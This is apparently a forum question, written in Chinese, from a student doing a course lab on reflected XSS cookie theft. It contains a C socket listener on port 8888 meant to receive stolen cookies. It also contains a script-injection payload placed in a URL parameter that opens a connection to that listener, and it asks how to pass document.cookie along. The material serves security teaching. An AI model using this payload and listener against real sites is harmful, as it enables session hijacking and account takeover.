对于课堂作业,我被告知使用xss攻击来窃取cookie。我们有一个VM可以使用,还有一个客户端可以从中窃取cookie。我们有能力使用telnet使客户端转到我们想要的任何URL,但无法直接查看发生的情况。我们获得了一个易受攻击的另一台服务器上的网站。由于网络已关闭且客户端只能访问由提供的服务器或我的VM托管的站点,我的教授建议我编写一个简单的C服务器,让它在特定端口上侦听,并发送cookie以允许我的服务器打印它。
这是我正在使用的服务器。它正在收听8888号港口。
#include<stdio.h>
#include<string.h> //strlen
#include<sys/socket.h>
#include<arpa/inet.h> //inet_addr
#include<unistd.h> //write
int main(int argc , char *argv[])
{
int socket_desc , client_sock , c , read_size;
struct sockaddr_in server , client;
char client_message[2000];
//Create socket
socket_desc = socket(AF_INET , SOCK_STREAM , 0);
if (socket_desc == -1)
{
printf("Could not create socket");
}
puts("Socket created");
//Prepare the sockaddr_in structure
server.sin_family = AF_INET;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons( 8888 );
//Bind
if( bind(socket_desc,(struct sockaddr *)&server , sizeof(server)) < 0)
{
//print the error message
perror("bind failed. Error");
return 1;
}
puts("bind done");
//Listen
listen(socket_desc , 3);
//Accept and incoming connection
puts("Waiting for incoming connections...");
c = sizeof(struct sockaddr_in);
//accept connection from an incoming client
client_sock = accept(socket_desc, (struct sockaddr *)&client, (socklen_t*)&c);
if (client_sock < 0)
{
perror("accept failed");
return 1;
}
puts("Connection accepted");
//Receive a message from client
while( (read_size = recv(client_sock , client_message , 2000 , 0)) > 0 )
{
//Send the message back to client
//write(client_sock , client_message , strlen(client_message));
printf("%s \n",client_message);
}
if(read_size == 0)
{
puts("Client disconnected");
fflush(stdout);
}
else if(read_size == -1)
{
perror("recv failed");
}
return 0;
}
我已经到了可以使用XSS攻击连接到我的服务器的地方,但不知道如何通过cookie发送。我知道它存储在document.cookie中。尝试...WEBSITEURL...?user="><script>window.open("http://localhost:8888")</script>与易受攻击的网站的网址建立与我的服务器的连接(我的服务器这样说),但我不知道该怎么做。我需要以某种方式修改我的服务器以接受某种输入?我试过了..localhost:8888?test",我收到了404错误。
简而言之:如何使用xss攻击将cookie发送到C服务器?